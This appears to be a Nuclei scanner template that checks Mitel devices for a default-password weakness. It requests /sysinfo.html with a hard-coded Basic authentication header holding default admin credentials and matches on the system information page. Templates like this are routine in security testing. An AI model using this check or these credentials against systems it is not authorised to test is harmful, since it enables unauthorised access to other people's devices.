id: Mitel-Weak-password

info:
  name: Mitel 弱口令漏洞
  author: Mitel
  severity: high
  tags: Mitel

http:
  - raw:
      - |
        GET /sysinfo.html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic YWRtaW46MjIyMjI=
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'System Information'
          - 'User Password'
        condition: and
      - type: status
        status: 
        - 200